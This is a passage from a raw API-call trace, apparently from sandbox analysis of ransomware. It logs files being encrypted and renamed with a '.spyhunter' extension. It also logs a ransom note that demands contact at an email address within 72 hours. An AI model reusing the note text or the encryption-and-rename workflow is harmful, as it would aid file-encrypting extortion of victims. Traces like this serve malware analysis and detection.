hHeap=0x2c0000) returned 1 [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383868 | out: hHeap=0x2c0000) returned 1 [0093.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9c8 | out: pbBuffer=0x270f9c8) returned 1 [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9c0*=0x30) returned 1 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381b98 | out: hHeap=0x2c0000) returned 1 [0093.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9c8 | out: pbBuffer=0x270f9c8) returned 1 [0093.339] GetProcessHeap () returned 0x2c0000 [0093.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9c0*=0x30) returned 1 [0093.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b220 | out: hHeap=0x2c0000) returned 1 [0093.340] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9c0 | out: pbBuffer=0x270f9c0) returned 1 [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9b8*=0x30) returned 1 [0093.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b110 | out: hHeap=0x2c0000) returned 1 [0093.340] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9c0 | out: pbBuffer=0x270f9c0) returned 1 [0093.340] GetProcessHeap () returned 0x2c0000 [0093.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9b8*=0x30) returned 1 [0093.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375928 | out: hHeap=0x2c0000) returned 1 [0093.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9b8 | out: pbBuffer=0x270f9b8) returned 1 [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9b0*=0x30) returned 1 [0093.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0093.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9b8 | out: pbBuffer=0x270f9b8) returned 1 [0093.341] GetProcessHeap () returned 0x2c0000 [0093.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9b0*=0x30) returned 1 [0093.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.342] GetProcessHeap () returned 0x2c0000 [0093.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.342] GetProcessHeap () returned 0x2c0000 [0093.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0093.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9b0 | out: pbBuffer=0x270f9b0) returned 1 [0093.342] GetProcessHeap () returned 0x2c0000 [0093.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9a8*=0x30) returned 1 [0093.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.342] GetProcessHeap () returned 0x2c0000 [0093.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.342] GetProcessHeap () returned 0x2c0000 [0093.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eab8 | out: hHeap=0x2c0000) returned 1 [0093.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.345] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.345] WriteFile (in: hFile=0x174, lpBuffer=0x270f8e3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fa0c, lpOverlapped=0x0 | out: lpBuffer=0x270f8e3*, lpNumberOfBytesWritten=0x270fa0c*=0x127, lpOverlapped=0x0) returned 1 [0093.346] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.346] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fa0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fa0c*=0x2ac, lpOverlapped=0x0) returned 1 [0093.346] CloseHandle (hObject=0x174) returned 1 [0093.347] GetProcessHeap () returned 0x2c0000 [0093.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0093.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9a8 | out: pbBuffer=0x270f9a8) returned 1 [0093.347] GetProcessHeap () returned 0x2c0000 [0093.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9a0*=0x30) returned 1 [0093.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.347] GetProcessHeap () returned 0x2c0000 [0093.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.347] GetProcessHeap () returned 0x2c0000 [0093.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381a90 | out: hHeap=0x2c0000) returned 1 [0093.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9a8 | out: pbBuffer=0x270f9a8) returned 1 [0093.347] GetProcessHeap () returned 0x2c0000 [0093.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f9a0*=0x30) returned 1 [0093.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.348] GetProcessHeap () returned 0x2c0000 [0093.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.348] GetProcessHeap () returned 0x2c0000 [0093.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0093.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9a0 | out: pbBuffer=0x270f9a0) returned 1 [0093.352] GetProcessHeap () returned 0x2c0000 [0093.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f998*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f998*=0x30) returned 1 [0093.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.352] GetProcessHeap () returned 0x2c0000 [0093.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.352] GetProcessHeap () returned 0x2c0000 [0093.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0093.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f9a0 | out: pbBuffer=0x270f9a0) returned 1 [0093.352] GetProcessHeap () returned 0x2c0000 [0093.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f998*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f998*=0x30) returned 1 [0093.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0093.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f998 | out: pbBuffer=0x270f998) returned 1 [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f990*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f990*=0x30) returned 1 [0093.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0093.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f998 | out: pbBuffer=0x270f998) returned 1 [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f990*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f990*=0x30) returned 1 [0093.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.353] GetProcessHeap () returned 0x2c0000 [0093.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0093.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f990 | out: pbBuffer=0x270f990) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f988*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f988*=0x30) returned 1 [0093.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0093.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f990 | out: pbBuffer=0x270f990) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f988*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f988*=0x30) returned 1 [0093.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346aa8 | out: hHeap=0x2c0000) returned 1 [0093.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f988 | out: pbBuffer=0x270f988) returned 1 [0093.354] GetProcessHeap () returned 0x2c0000 [0093.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f980*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f980*=0x30) returned 1 [0093.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.355] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0093.355] StrStrW (lpFirst="MSB1FREN.DLL", lpSrch=".txt") returned 0x0 [0093.355] GetProcessHeap () returned 0x2c0000 [0093.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0093.355] ReadFile (in: hFile=0x174, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x270f944*=0x2800, lpOverlapped=0x0) returned 1 [0093.379] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.379] WriteFile (in: hFile=0x174, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x270f944*=0x2800, lpOverlapped=0x0) returned 1 [0093.379] GetProcessHeap () returned 0x2c0000 [0093.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.379] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.379] WriteFile (in: hFile=0x174, lpBuffer=0x270f984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x270f984*, lpNumberOfBytesWritten=0x270f944*=0x4, lpOverlapped=0x0) returned 1 [0093.810] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f944*=0x30, lpOverlapped=0x0) returned 1 [0093.810] CloseHandle (hObject=0x174) returned 1 [0093.842] GetProcessHeap () returned 0x2c0000 [0093.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0093.843] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.spyhunter") returned 87 [0093.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll.spyhunter")) returned 1 [0093.844] GetProcessHeap () returned 0x2c0000 [0093.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0093.844] GetProcessHeap () returned 0x2c0000 [0093.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.844] GetProcessHeap () returned 0x2c0000 [0093.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377b68 | out: hHeap=0x2c0000) returned 1 [0093.844] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f988 | out: pbBuffer=0x270f988) returned 1 [0093.844] GetProcessHeap () returned 0x2c0000 [0093.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f980*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f980*=0x30) returned 1 [0093.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.845] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 